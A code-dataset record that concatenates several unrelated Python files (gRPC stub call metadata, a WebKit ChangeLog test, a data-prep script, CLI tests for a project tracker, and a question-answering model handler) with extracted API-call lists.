[((7315, 7381), 'grpc.method_handlers_generic_handler', 'grpc.method_handlers_generic_handler', (['"""Agent"""', 'rpc_method_handlers'], {}), "('Agent', rpc_method_handlers)\n", (7351, 7381), False, 'import grpc\n'), ((5043, 5228), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.InitializeAgents'], {'request_deserializer': 'example__pb2.Request.FromString', 'response_serializer': 'example__pb2.Response.SerializeToString'}), '(servicer.InitializeAgents,\n request_deserializer=example__pb2.Request.FromString,\n response_serializer=example__pb2.Response.SerializeToString)\n', (5078, 5228), False, 'import grpc\n'), ((5326, 5508), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.HandleMessage'], {'request_deserializer': 'example__pb2.Request.FromString', 'response_serializer': 'example__pb2.Response.SerializeToString'}), '(servicer.HandleMessage,\n request_deserializer=example__pb2.Request.FromString,\n response_serializer=example__pb2.Response.SerializeToString)\n', (5361, 5508), False, 'import grpc\n'), ((5608, 5792), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.InvokeSoloAgent'], {'request_deserializer': 'example__pb2.Request.FromString', 'response_serializer': 'example__pb2.Response.SerializeToString'}), '(servicer.InvokeSoloAgent,\n request_deserializer=example__pb2.Request.FromString,\n response_serializer=example__pb2.Response.SerializeToString)\n', (5643, 5792), False, 'import grpc\n'), ((5886, 6064), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.GetAgents'], {'request_deserializer': 'example__pb2.Request.FromString', 'response_serializer': 'example__pb2.Response.SerializeToString'}), '(servicer.GetAgents,\n request_deserializer=example__pb2.Request.FromString,\n response_serializer=example__pb2.Response.SerializeToString)\n', (5921, 6064), False, 'import grpc\n'), ((6163, 6346), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.SetAgentFields'], {'request_deserializer': 'example__pb2.Request.FromString', 'response_serializer': 'example__pb2.Response.SerializeToString'}), '(servicer.SetAgentFields,\n request_deserializer=example__pb2.Request.FromString,\n response_serializer=example__pb2.Response.SerializeToString)\n', (6198, 6346), False, 'import grpc\n'), ((6449, 6636), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.HandleSlashCommand'], {'request_deserializer': 'example__pb2.Request.FromString', 'response_serializer': 'example__pb2.Response.SerializeToString'}), '(servicer.HandleSlashCommand,\n request_deserializer=example__pb2.Request.FromString,\n response_serializer=example__pb2.Response.SerializeToString)\n', (6484, 6636), False, 'import grpc\n'), ((6737, 6922), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.HandleUserUpdate'], {'request_deserializer': 'example__pb2.Request.FromString', 'response_serializer': 'example__pb2.Response.SerializeToString'}), '(servicer.HandleUserUpdate,\n request_deserializer=example__pb2.Request.FromString,\n response_serializer=example__pb2.Response.SerializeToString)\n', (6772, 6922), False, 'import grpc\n'), ((7028, 7218), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.HandleMessageReaction'], {'request_deserializer': 'example__pb2.Request.FromString', 'response_serializer': 'example__pb2.Response.SerializeToString'}), '(servicer.HandleMessageReaction,\n request_deserializer=example__pb2.Request.FromString,\n response_serializer=example__pb2.Response.SerializeToString)\n', (7063, 7218), False, 'import grpc\n'), ((7917, 8183), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/Agent/InitializeAgents"""', 'example__pb2.Request.SerializeToString', 'example__pb2.Response.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target, '/Agent/InitializeAgents',\n example__pb2.Request.SerializeToString, example__pb2.Response.\n FromString, options, channel_credentials, insecure, call_credentials,\n compression, wait_for_ready, timeout, metadata)\n", (7946, 8183), False, 'import grpc\n'), ((8546, 8809), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/Agent/HandleMessage"""', 'example__pb2.Request.SerializeToString', 'example__pb2.Response.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target, '/Agent/HandleMessage',\n example__pb2.Request.SerializeToString, example__pb2.Response.\n FromString, options, channel_credentials, insecure, call_credentials,\n compression, wait_for_ready, timeout, metadata)\n", (8575, 8809), False, 'import grpc\n'), ((9174, 9439), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/Agent/InvokeSoloAgent"""', 'example__pb2.Request.SerializeToString', 'example__pb2.Response.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target, '/Agent/InvokeSoloAgent',\n example__pb2.Request.SerializeToString, example__pb2.Response.\n FromString, options, channel_credentials, insecure, call_credentials,\n compression, wait_for_ready, timeout, metadata)\n", (9203, 9439), False, 'import grpc\n'), ((9798, 10057), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/Agent/GetAgents"""', 'example__pb2.Request.SerializeToString', 'example__pb2.Response.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target, '/Agent/GetAgents',\n example__pb2.Request.SerializeToString, example__pb2.Response.\n FromString, options, channel_credentials, insecure, call_credentials,\n compression, wait_for_ready, timeout, metadata)\n", (9827, 10057), False, 'import grpc\n'), ((10421, 10685), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/Agent/SetAgentFields"""', 'example__pb2.Request.SerializeToString', 'example__pb2.Response.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target, '/Agent/SetAgentFields',\n example__pb2.Request.SerializeToString, example__pb2.Response.\n FromString, options, channel_credentials, insecure, call_credentials,\n compression, wait_for_ready, timeout, metadata)\n", (10450, 10685), False, 'import grpc\n'), ((11053, 11321), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/Agent/HandleSlashCommand"""', 'example__pb2.Request.SerializeToString', 'example__pb2.Response.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target, '/Agent/HandleSlashCommand',\n example__pb2.Request.SerializeToString, example__pb2.Response.\n FromString, options, channel_credentials, insecure, call_credentials,\n compression, wait_for_ready, timeout, metadata)\n", (11082, 11321), False, 'import grpc\n'), ((11687, 11953), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/Agent/HandleUserUpdate"""', 'example__pb2.Request.SerializeToString', 'example__pb2.Response.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target, '/Agent/HandleUserUpdate',\n example__pb2.Request.SerializeToString, example__pb2.Response.\n FromString, options, channel_credentials, insecure, call_credentials,\n compression, wait_for_ready, timeout, metadata)\n", (11716, 11953), False, 'import grpc\n'), ((12324, 12594), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/Agent/HandleMessageReaction"""', 'example__pb2.Request.SerializeToString', 'example__pb2.Response.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/Agent/HandleMessageReaction', example__pb2.Request.SerializeToString,\n example__pb2.Response.FromString, options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n", (12353, 12594), False, 'import grpc\n')]
|
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import unittest
from webkitpy.common.checkout.changelog_unittest import ChangeLogTest
from webkitpy.common.system.outputcapture import OutputCapture
from webkitpy.tool.mocktool import MockOptions, MockTool
from webkitpy.tool.steps.preparechangelog import PrepareChangeLog
class PrepareChangeLogTest(ChangeLogTest):
def test_ensure_bug_url(self):
capture = OutputCapture()
step = PrepareChangeLog(MockTool(), MockOptions())
changelog_contents = u"%s\n%s" % (self._new_entry_boilerplate, self._example_changelog)
changelog_path = self._write_tmp_file_with_contents(changelog_contents.encode("utf-8"))
state = {
"bug_title": "Example title",
"bug_id": 1234,
"changelogs": [changelog_path],
}
capture.assert_outputs(self, step.run, [state])
actual_contents = self._read_file_contents(changelog_path, "utf-8")
expected_message = "Example title\n http://example.com/1234"
expected_contents = changelog_contents.replace("Need a short description and bug URL (OOPS!)", expected_message)
os.remove(changelog_path)
self.assertEquals(actual_contents.splitlines(), expected_contents.splitlines())
|
[
"webkitpy.tool.mocktool.MockTool",
"os.remove",
"webkitpy.tool.mocktool.MockOptions",
"webkitpy.common.system.outputcapture.OutputCapture"
] |
[((1908, 1923), 'webkitpy.common.system.outputcapture.OutputCapture', 'OutputCapture', ([], {}), '()\n', (1921, 1923), False, 'from webkitpy.common.system.outputcapture import OutputCapture\n'), ((2654, 2679), 'os.remove', 'os.remove', (['changelog_path'], {}), '(changelog_path)\n', (2663, 2679), False, 'import os\n'), ((1956, 1966), 'webkitpy.tool.mocktool.MockTool', 'MockTool', ([], {}), '()\n', (1964, 1966), False, 'from webkitpy.tool.mocktool import MockOptions, MockTool\n'), ((1968, 1981), 'webkitpy.tool.mocktool.MockOptions', 'MockOptions', ([], {}), '()\n', (1979, 1981), False, 'from webkitpy.tool.mocktool import MockOptions, MockTool\n')]
|
import argparse
import os
print("In dataprep.py: as a data scientist, this is where you should fill in your dataprep code.")
parser = argparse.ArgumentParser("dataprep")
parser.add_argument("--input_data", type=str, help="input data")
parser.add_argument("--processed_data", type=str, help="processed_data directory")
args = parser.parse_args()
print(f"Argument 1: {args.input_data}")
print(f"Argument 2: {args.processed_data}")
if not (args.processed_data is None):
os.makedirs(args.processed_data, exist_ok=True)
print(f"{args.processed_data} created")
|
[
"os.makedirs",
"argparse.ArgumentParser"
] |
[((136, 171), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""dataprep"""'], {}), "('dataprep')\n", (159, 171), False, 'import argparse\n'), ((474, 521), 'os.makedirs', 'os.makedirs', (['args.processed_data'], {'exist_ok': '(True)'}), '(args.processed_data, exist_ok=True)\n', (485, 521), False, 'import os\n')]
|
import unittest
import click
from click.testing import CliRunner
# init database
from gather2gether.db import g2gDB
from gather2gether.db import *
init_database(g2gDB)
from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete
from gather2gether.db.task import task_delete, task_search
from gather2gether.db.user import user_create, user_search, user_delete
from gather2gether.cli_project import cli_project_create, cli_project_find, cli_project_search, cli_project_update, cli_project_delete
import logging
logging.disable(logging.NOTSET)
class TestCliProject(unittest.TestCase):
def setUp(self):
# delete all tasks in database
found_tasks = task_search()
for task in found_tasks:
task_delete(task.project.project_name, task.task_number)
# delete all projects in database
found_projects = project_search()
for project in found_projects:
project_delete(project.project_name)
# delete all users in database
found_users = user_search()
for user in found_users:
user_delete(user.external_id)
def test_cli_project_create(self):
project_identifier = "test_cli_project_create"
runner = CliRunner()
result = runner.invoke(cli_project_create, [project_identifier])
self.assertIsNone(result.exception)
self.assertIn("Project created successfully", result.output)
project_found = project_find(project_identifier)
self.assertIsNotNone(project_found)
self.assertEqual(project_found.project_name, project_identifier)
def test_cli_project_create_full(self):
project_identifier = "test_cli_project_create"
expected_description = "description of test_cli_project_create"
expected_start_date = "2020-01-01"
expected_end_date = "2020-01-10"
runner = CliRunner()
result = runner.invoke(cli_project_create, [
project_identifier,
"--description", expected_description,
"--planned_start_date", expected_start_date,
"--planned_end_date", expected_end_date
])
self.assertIsNone(result.exception)
self.assertIn("Project created successfully", result.output)
project_found = project_find(project_identifier)
self.assertIsNotNone(project_found)
self.assertEqual(project_found.project_name, project_identifier)
self.assertEqual(project_found.description, expected_description)
self.assertEqual(project_found.planned_start_date, datetime.datetime.strptime(expected_start_date, "%Y-%m-%d"))
self.assertEqual(project_found.planned_end_date, datetime.datetime.strptime(expected_end_date, "%Y-%m-%d"))
def test_cli_project_create_already_exists(self):
project_identifier = "test_cli_project_create_already_exists"
project_create(project_identifier)
runner = CliRunner()
result = runner.invoke(cli_project_create, [project_identifier])
self.assertIsNone(result.exception)
self.assertIn("Failed to create project", result.output)
def test_cli_project_find_by_name_not_exists(self):
project_identifier = "test_cli_project_find_by_name_not_exists"
runner = CliRunner()
result = runner.invoke(cli_project_find, [project_identifier])
self.assertIsNone(result.exception)
self.assertIn("Not found project with identifier {0}".format(project_identifier), result.output)
def test_cli_project_find_by_id_not_exists(self):
project_identifier = "-50"
runner = CliRunner()
result = runner.invoke(cli_project_find, ["--identifier_type", "id", "--", project_identifier])
self.assertIsNone(result.exception)
self.assertIn("Not found project with identifier {0}".format(project_identifier), result.output)
def test_cli_project_find_by_name_exists(self):
project_identifier = "test_cli_project_find_by_name_exists"
project_create(project_identifier)
runner = CliRunner()
result = runner.invoke(cli_project_find, [project_identifier])
self.assertIsNone(result.exception)
self.assertIn("Found project with identifier {0}".format(project_identifier), result.output)
def test_cli_project_find_by_id_exists(self):
project = project_create("test_cli_project_find_by_id_exists")
project_identifier = str(project.id)
runner = CliRunner()
result = runner.invoke(cli_project_find, [project_identifier, "--identifier_type", "id"])
self.assertIsNone(result.exception)
self.assertIn("Found project with identifier {0}".format(project_identifier), result.output)
def test_cli_project_search_closed(self):
project_identifier = "test_cli_project_search_closed"
project_create(project_identifier)
project_update(project_identifier, closed_date="2020-01-01")
runner = CliRunner()
result = runner.invoke(cli_project_search, ["--is_closed", "true"])
self.assertIsNone(result.exception)
self.assertIn("Search properly finished", result.output)
self.assertIn(project_identifier, result.output)
result = runner.invoke(cli_project_search, ["--is_closed", "false"])
self.assertIsNone(result.exception)
self.assertIn("Search properly finished", result.output)
self.assertNotIn(project_identifier, result.output)
def test_cli_project_search_not_closed(self):
project_identifier = "test_cli_project_search_not_closed"
project_create(project_identifier)
runner = CliRunner()
result = runner.invoke(cli_project_search, ["--is_closed", "true"])
self.assertIsNone(result.exception)
self.assertIn("Search properly finished", result.output)
self.assertNotIn(project_identifier, result.output)
result = runner.invoke(cli_project_search, ["--is_closed", "false"])
self.assertIsNone(result.exception)
self.assertIn("Search properly finished", result.output)
self.assertIn(project_identifier, result.output)
def test_cli_project_update_by_name_exists(self):
project_identifier = "test_cli_project_update_by_name_exists"
expected_new_name = "test_cli_project_update_by_name_exists updated"
project_create(project_identifier)
runner = CliRunner()
result = runner.invoke(cli_project_update, [project_identifier, "--project_name", expected_new_name])
self.assertIsNone(result.exception)
self.assertIn("Successfuly updated project name: {0}".format(project_identifier), result.output)
project_found = project_find(project_identifier)
self.assertIsNone(project_found)
project_found = project_find(expected_new_name)
self.assertIsNotNone(project_found)
def test_cli_project_update_by_id_exists(self):
expected_new_name = "test_cli_project_update_by_id_exists updated"
project = project_create("test_cli_project_update_by_id_exists")
project_identifier = str(project.id)
runner = CliRunner()
result = runner.invoke(cli_project_update, [project_identifier, "--identifier_type", "id", "--project_name", expected_new_name])
self.assertIsNone(result.exception)
self.assertIn("Successfuly updated project name: {0}".format(project_identifier), result.output)
project_found = project_find(project.id)
self.assertIsNotNone(project_found)
self.assertEqual(project_found.project_name, expected_new_name)
def test_cli_project_update_by_name_not_exists(self):
project_identifier = "test_cli_project_update_by_name_exists"
runner = CliRunner()
result = runner.invoke(cli_project_update, [project_identifier, "--project_name", "new project name"])
self.assertIsNone(result.exception)
self.assertIn("Not found project to update, name:{0}".format(project_identifier), result.output)
def test_cli_project_update_by_id_not_exists(self):
project_identifier = "-50"
runner = CliRunner()
result = runner.invoke(cli_project_update, ["--identifier_type", "id", "--project_name", "new project name", "--", project_identifier])
self.assertIsNone(result.exception)
self.assertIn("Not found project to update, name:{0}".format(project_identifier), result.output)
def test_cli_project_delete_by_name(self):
project_identifier = "test_cli_project_delete_by_name"
project_create(project_identifier)
runner = CliRunner()
result = runner.invoke(cli_project_delete, [project_identifier])
self.assertIsNone(result.exception)
self.assertIn("Successfuly deleted project name: {0}".format(project_identifier), result.output)
project_found = project_find(project_identifier)
self.assertIsNone(project_found)
def test_cli_project_delete_by_id(self):
project = project_create("test_cli_project_delete_by_id")
project_identifier = str(project.id)
runner = CliRunner()
result = runner.invoke(cli_project_delete, [project_identifier, "--identifier_type", "id"])
self.assertIsNone(result.exception)
self.assertIn("Successfuly deleted project name: {0}".format(project_identifier), result.output)
project_found = project_find(project.id)
self.assertIsNone(project_found)
|
[
"gather2gether.db.project.project_update",
"gather2gether.db.project.project_find",
"gather2gether.db.task.task_search",
"gather2gether.db.project.project_create",
"gather2gether.db.project.project_delete",
"gather2gether.db.project.project_search",
"logging.disable",
"gather2gether.db.user.user_delete",
"click.testing.CliRunner",
"gather2gether.db.user.user_search",
"gather2gether.db.task.task_delete"
] |
[((567, 598), 'logging.disable', 'logging.disable', (['logging.NOTSET'], {}), '(logging.NOTSET)\n', (582, 598), False, 'import logging\n'), ((724, 737), 'gather2gether.db.task.task_search', 'task_search', ([], {}), '()\n', (735, 737), False, 'from gather2gether.db.task import task_delete, task_search\n'), ((907, 923), 'gather2gether.db.project.project_search', 'project_search', ([], {}), '()\n', (921, 923), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((1073, 1086), 'gather2gether.db.user.user_search', 'user_search', ([], {}), '()\n', (1084, 1086), False, 'from gather2gether.db.user import user_create, user_search, user_delete\n'), ((1274, 1285), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1283, 1285), False, 'from click.testing import CliRunner\n'), ((1496, 1528), 'gather2gether.db.project.project_find', 'project_find', (['project_identifier'], {}), '(project_identifier)\n', (1508, 1528), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((1919, 1930), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1928, 1930), False, 'from click.testing import CliRunner\n'), ((2328, 2360), 'gather2gether.db.project.project_find', 'project_find', (['project_identifier'], {}), '(project_identifier)\n', (2340, 2360), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((2921, 2955), 'gather2gether.db.project.project_create', 'project_create', (['project_identifier'], {}), '(project_identifier)\n', (2935, 2955), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((2973, 2984), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (2982, 2984), False, 'from click.testing import CliRunner\n'), ((3313, 3324), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (3322, 3324), False, 'from click.testing import CliRunner\n'), ((3652, 3663), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (3661, 3663), False, 'from click.testing import CliRunner\n'), ((4046, 4080), 'gather2gether.db.project.project_create', 'project_create', (['project_identifier'], {}), '(project_identifier)\n', (4060, 4080), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((4098, 4109), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (4107, 4109), False, 'from click.testing import CliRunner\n'), ((4395, 4447), 'gather2gether.db.project.project_create', 'project_create', (['"""test_cli_project_find_by_id_exists"""'], {}), "('test_cli_project_find_by_id_exists')\n", (4409, 4447), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((4510, 4521), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (4519, 4521), False, 'from click.testing import CliRunner\n'), ((4882, 4916), 'gather2gether.db.project.project_create', 'project_create', (['project_identifier'], {}), '(project_identifier)\n', (4896, 4916), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((4925, 4985), 'gather2gether.db.project.project_update', 'project_update', (['project_identifier'], {'closed_date': '"""2020-01-01"""'}), "(project_identifier, closed_date='2020-01-01')\n", (4939, 4985), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((5003, 5014), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (5012, 5014), False, 'from click.testing import CliRunner\n'), ((5628, 5662), 'gather2gether.db.project.project_create', 'project_create', (['project_identifier'], {}), '(project_identifier)\n', (5642, 5662), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((5680, 5691), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (5689, 5691), False, 'from click.testing import CliRunner\n'), ((6390, 6424), 'gather2gether.db.project.project_create', 'project_create', (['project_identifier'], {}), '(project_identifier)\n', (6404, 6424), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((6442, 6453), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (6451, 6453), False, 'from click.testing import CliRunner\n'), ((6737, 6769), 'gather2gether.db.project.project_find', 'project_find', (['project_identifier'], {}), '(project_identifier)\n', (6749, 6769), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((6835, 6866), 'gather2gether.db.project.project_find', 'project_find', (['expected_new_name'], {}), '(expected_new_name)\n', (6847, 6866), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((7057, 7111), 'gather2gether.db.project.project_create', 'project_create', (['"""test_cli_project_update_by_id_exists"""'], {}), "('test_cli_project_update_by_id_exists')\n", (7071, 7111), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((7174, 7185), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (7183, 7185), False, 'from click.testing import CliRunner\n'), ((7496, 7520), 'gather2gether.db.project.project_find', 'project_find', (['project.id'], {}), '(project.id)\n', (7508, 7520), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((7783, 7794), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (7792, 7794), False, 'from click.testing import CliRunner\n'), ((8164, 8175), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (8173, 8175), False, 'from click.testing import CliRunner\n'), ((8588, 8622), 'gather2gether.db.project.project_create', 'project_create', (['project_identifier'], {}), '(project_identifier)\n', (8602, 8622), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((8640, 8651), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (8649, 8651), False, 'from click.testing import CliRunner\n'), ((8898, 8930), 'gather2gether.db.project.project_find', 'project_find', (['project_identifier'], {}), '(project_identifier)\n', (8910, 8930), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((9036, 9083), 'gather2gether.db.project.project_create', 'project_create', (['"""test_cli_project_delete_by_id"""'], {}), "('test_cli_project_delete_by_id')\n", (9050, 9083), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((9146, 9157), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (9155, 9157), False, 'from click.testing import CliRunner\n'), ((9431, 9455), 'gather2gether.db.project.project_find', 'project_find', (['project.id'], {}), '(project.id)\n', (9443, 9455), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((783, 839), 'gather2gether.db.task.task_delete', 'task_delete', (['task.project.project_name', 'task.task_number'], {}), '(task.project.project_name, task.task_number)\n', (794, 839), False, 'from gather2gether.db.task import task_delete, task_search\n'), ((975, 1011), 'gather2gether.db.project.project_delete', 'project_delete', (['project.project_name'], {}), '(project.project_name)\n', (989, 1011), False, 'from gather2gether.db.project import project_create, project_find, project_update, project_search, project_delete\n'), ((1132, 1161), 'gather2gether.db.user.user_delete', 'user_delete', (['user.external_id'], {}), '(user.external_id)\n', (1143, 1161), False, 'from gather2gether.db.user import user_create, user_search, user_delete\n')]
|
import json
import logging
import os
from pathlib import Path
import collections
import ast
import yaml
from fire import Fire
import time
import torch
from torch.nn import functional as F
from transformers import AutoTokenizer, AutoModelForQuestionAnswering
from health_qa.src.utils import chunks_ques_wrapper
# change the directory to the project root
logger = logging.getLogger(__name__)
project_path = str(Path(__file__).parent.parent.parent)
os.chdir(project_path)
config = 'server/config/handler_config.yaml'
with open(config, 'r') as stream:
config = yaml.load(stream, Loader=yaml.FullLoader)
initialized = False
initialized_result = None
def initialize(context):
global initialized
global initialized_result
if initialized:
return
initialized = True
# get cuda deivce
properties = context.system_properties
device = torch.device("cuda:" + str(properties.get("gpu_id"))
if torch.cuda.is_available() else "cpu")
# Load a trained model and vocabulary that you have fine-tuned
model = AutoModelForQuestionAnswering.from_pretrained(config['MODEL_DIR']) # , force_download=True)
tokenizer = AutoTokenizer.from_pretrained(config['MODEL_DIR'], do_lower_case=True)
model.to(device)
model.eval()
initialized_result = model, tokenizer, device
def process_request(requests, context):
_contexts = []
_questions = []
for request in requests:
_context = []
text_json = request.get("data")
if text_json is None:
# convert bytearray to utf-8
text_json = request.get("body").decode('utf-8')
basic_info = ast.literal_eval(text_json)
text = basic_info.get('context')
questions = basic_info.get('questions')
if not questions:
questions_list = []
else:
questions_list = {q['content']:q['ID'] for q in questions}
_context.append(text)
_contexts.append(_context)
_questions.append(questions_list)
return _contexts, _questions
# @chunks_ques_wrapper(all_ques, size=12)
def inference(model, tokenizer, device, text, questions=None):
inputs = tokenizer(questions, text*len(questions), add_special_tokens=True, return_tensors="pt", padding=True)
input_ids = inputs["input_ids"].tolist()
inputs.to(device)
with torch.no_grad():
answer_scores = model(**inputs)
# To get the score by softmax
answer_start_scores, answer_end_scores = F.softmax(torch.stack(answer_scores), dim=-1)
# Get the most likely beginning of answer with the argmax of the score
answer_s_max_scores, answer_starts = torch.max(answer_start_scores, -1)
# Get the most likely end of answer with the argmax of the score
answer_e_max_scores, answer_ends = torch.max(answer_end_scores, -1)
answer_ends = answer_ends + 1
confidences = (answer_s_max_scores + answer_e_max_scores) / 2
# release the memory to avoid the OOM
torch.cuda.empty_cache()
return input_ids, answer_starts, answer_ends, confidences
def postprocessing(tokenizer, input_ids, answer_starts, answer_ends, confidences, all_ques):
answers = []
for input_id, answer_start, answer_end in zip(input_ids, answer_starts, answer_ends):
answer = tokenizer.convert_tokens_to_string(tokenizer.convert_ids_to_tokens(input_id[answer_start:answer_end]))
answer = answer.replace(' ', '')
# the question does not have the answer
if '[CLS]' in answer or '[SEP]' in answer or answer=='':
answer = '無答案'
answers.append(answer)
response = collections.defaultdict(dict)
for question, answer, confidence in zip(all_ques, answers, confidences):
qid = all_ques[question]
response[qid].update({'Question': question})
response[qid].update({'Answer': answer})
response[qid].update({'Confidence': f'{confidence:.2f}'})
response = dict(sorted(response.items(), key=lambda pair: pair[0]))
basic_info = {}
t = time.localtime()
timestamp = time.strftime('%Y%m%d%H%M%S', t)
basic_info['timestamp'] = str(timestamp)
basic_info['Questions'] = response
return basic_info
def handler(data, context):
if data is None:
initialize(context)
return None
assert initialized_result is not None
model, tokenizer, device = initialized_result
responses = []
contexts, _questions = process_request(data, context)
for context, questions_dict in zip(contexts, _questions):
questions = list(questions_dict.keys())
input_ids, answer_starts, answer_ends, confidences = chunks_ques_wrapper(all_ques=questions, size=13)(inference)(model, tokenizer, device, text=context)
response = postprocessing(tokenizer, input_ids, answer_starts, answer_ends, confidences, questions_dict)
responses.append(response)
return responses
def main_test_handler(loop_count=1, batch_size=3):
from easydict import EasyDict
from tqdm import tqdm
import json
test_json_path = 'server/test_json/sample_text1.txt'
json_context = json.load(open(test_json_path))
data = [{
'body': json.dumps(json_context).encode('utf8')
}] * batch_size
context = {
'system_properties': {
'gpu_id': '0'
}
}
context = EasyDict(context)
responses = handler(None, context)
responses = handler(data, context)
timer = tqdm(total=batch_size*loop_count,
smoothing=0.0, dynamic_ncols=True)
for _ in range(loop_count):
handler(data, context)
timer.update(batch_size)
if __name__ == '__main__':
Fire(main_test_handler)
|
[
"yaml.load",
"time.strftime",
"logging.getLogger",
"json.dumps",
"collections.defaultdict",
"pathlib.Path",
"torch.no_grad",
"os.chdir",
"transformers.AutoModelForQuestionAnswering.from_pretrained",
"easydict.EasyDict",
"time.localtime",
"tqdm.tqdm",
"transformers.AutoTokenizer.from_pretrained",
"torch.max",
"torch.cuda.is_available",
"fire.Fire",
"torch.stack",
"torch.cuda.empty_cache",
"ast.literal_eval",
